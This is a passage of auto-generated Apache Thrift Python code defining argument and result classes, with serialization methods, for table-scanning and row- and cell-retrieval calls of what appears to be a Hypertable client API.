def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.scanner = iprot.readI64();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('next_cells_serialized_args')
if self.scanner != None:
oprot.writeFieldBegin('scanner', TType.I64, 1)
oprot.writeI64(self.scanner)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class next_cells_serialized_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.STRING, 'success', None, None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('next_cells_serialized_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class next_row_args:
"""
Attributes:
- scanner
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'scanner', None, None, ), # 1
)
def __init__(self, scanner=None,):
self.scanner = scanner
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.scanner = iprot.readI64();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('next_row_args')
if self.scanner != None:
oprot.writeFieldBegin('scanner', TType.I64, 1)
oprot.writeI64(self.scanner)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class next_row_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRUCT,(Cell, Cell.thrift_spec)), None, ), # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype70, _size67) = iprot.readListBegin()
for _i71 in xrange(_size67):
_elem72 = Cell()
_elem72.read(iprot)
self.success.append(_elem72)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('next_row_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRUCT, len(self.success))
for iter73 in self.success:
iter73.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class next_row_as_arrays_args:
"""
Attributes:
- scanner
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'scanner', None, None, ), # 1
)
def __init__(self, scanner=None,):
self.scanner = scanner
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.scanner = iprot.readI64();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('next_row_as_arrays_args')
if self.scanner != None:
oprot.writeFieldBegin('scanner', TType.I64, 1)
oprot.writeI64(self.scanner)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class next_row_as_arrays_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.LIST,(TType.STRING,None)), None, ), # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype77, _size74) = iprot.readListBegin()
for _i78 in xrange(_size74):
_elem79 = []
(_etype83, _size80) = iprot.readListBegin()
for _i84 in xrange(_size80):
_elem85 = iprot.readString();
_elem79.append(_elem85)
iprot.readListEnd()
self.success.append(_elem79)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('next_row_as_arrays_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.LIST, len(self.success))
for iter86 in self.success:
oprot.writeListBegin(TType.STRING, len(iter86))
for iter87 in iter86:
oprot.writeString(iter87)
oprot.writeListEnd()
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class next_row_serialized_args:
"""
Attributes:
- scanner
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'scanner', None, None, ), # 1
)
def __init__(self, scanner=None,):
self.scanner = scanner
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.scanner = iprot.readI64();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('next_row_serialized_args')
if self.scanner != None:
oprot.writeFieldBegin('scanner', TType.I64, 1)
oprot.writeI64(self.scanner)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class next_row_serialized_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.STRING, 'success', None, None, ), # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('next_row_serialized_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success)
oprot.writeFieldEnd()
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_row_args:
"""
Attributes:
- ns
- table_name
- row
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'ns', None, None, ), # 1
(2, TType.STRING, 'table_name', None, None, ), # 2
(3, TType.STRING, 'row', None, None, ), # 3
)
def __init__(self, ns=None, table_name=None, row=None,):
self.ns = ns
self.table_name = table_name
self.row = row
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.ns = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.table_name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.row = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_row_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.I64, 1)
oprot.writeI64(self.ns)
oprot.writeFieldEnd()
if self.table_name != None:
oprot.writeFieldBegin('table_name', TType.STRING, 2)
oprot.writeString(self.table_name)
oprot.writeFieldEnd()
if self.row != None:
oprot.writeFieldBegin('row', TType.STRING, 3)
oprot.writeString(self.row)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_row_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRUCT,(Cell, Cell.thrift_spec)), None, ), # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype91, _size88) = iprot.readListBegin()
for _i92 in xrange(_size88):
_elem93 = Cell()
_elem93.read(iprot)
self.success.append(_elem93)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_row_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRUCT, len(self.success))
for iter94 in self.success:
iter94.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_row_as_arrays_args:
"""
Attributes:
- ns
- name
- row
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'ns', None, None, ), # 1
(2, TType.STRING, 'name', None, None, ), # 2
(3, TType.STRING, 'row', None, None, ), # 3
)
def __init__(self, ns=None, name=None, row=None,):
self.ns = ns
self.name = name
self.row = row
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.ns = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.row = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_row_as_arrays_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.I64, 1)
oprot.writeI64(self.ns)
oprot.writeFieldEnd()
if self.name != None:
oprot.writeFieldBegin('name', TType.STRING, 2)
oprot.writeString(self.name)
oprot.writeFieldEnd()
if self.row != None:
oprot.writeFieldBegin('row', TType.STRING, 3)
oprot.writeString(self.row)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_row_as_arrays_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.LIST,(TType.STRING,None)), None, ), # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype98, _size95) = iprot.readListBegin()
for _i99 in xrange(_size95):
_elem100 = []
(_etype104, _size101) = iprot.readListBegin()
for _i105 in xrange(_size101):
_elem106 = iprot.readString();
_elem100.append(_elem106)
iprot.readListEnd()
self.success.append(_elem100)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_row_as_arrays_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.LIST, len(self.success))
for iter107 in self.success:
oprot.writeListBegin(TType.STRING, len(iter107))
for iter108 in iter107:
oprot.writeString(iter108)
oprot.writeListEnd()
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_row_serialized_args:
"""
Attributes:
- ns
- table_name
- row
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'ns', None, None, ), # 1
(2, TType.STRING, 'table_name', None, None, ), # 2
(3, TType.STRING, 'row', None, None, ), # 3
)
def __init__(self, ns=None, table_name=None, row=None,):
self.ns = ns
self.table_name = table_name
self.row = row
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.ns = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.table_name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.row = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_row_serialized_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.I64, 1)
oprot.writeI64(self.ns)
oprot.writeFieldEnd()
if self.table_name != None:
oprot.writeFieldBegin('table_name', TType.STRING, 2)
oprot.writeString(self.table_name)
oprot.writeFieldEnd()
if self.row != None:
oprot.writeFieldBegin('row', TType.STRING, 3)
oprot.writeString(self.row)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_row_serialized_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.STRING, 'success', None, None, ), # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_row_serialized_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success)
oprot.writeFieldEnd()
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_cell_args:
"""
Attributes:
- ns
- table_name
- row
- column
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'ns', None, None, ), # 1
(2, TType.STRING, 'table_name', None, None, ), # 2
(3, TType.STRING, 'row', None, None, ), # 3
(4, TType.STRING, 'column', None, None, ), # 4
)
def __init__(self, ns=None, table_name=None, row=None, column=None,):
self.ns = ns
self.table_name = table_name
self.row = row
self.column = column
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.ns = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.table_name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.row = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.column = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_cell_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.I64, 1)
oprot.writeI64(self.ns)
oprot.writeFieldEnd()
if self.table_name != None:
oprot.writeFieldBegin('table_name', TType.STRING, 2)
oprot.writeString(self.table_name)
oprot.writeFieldEnd()
if self.row != None:
oprot.writeFieldBegin('row', TType.STRING, 3)
oprot.writeString(self.row)
oprot.writeFieldEnd()
if self.column != None:
oprot.writeFieldBegin('column', TType.STRING, 4)
oprot.writeString(self.column)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_cell_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.STRING, 'success', None, None, ), # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_cell_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success)
oprot.writeFieldEnd()
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_cells_args:
"""
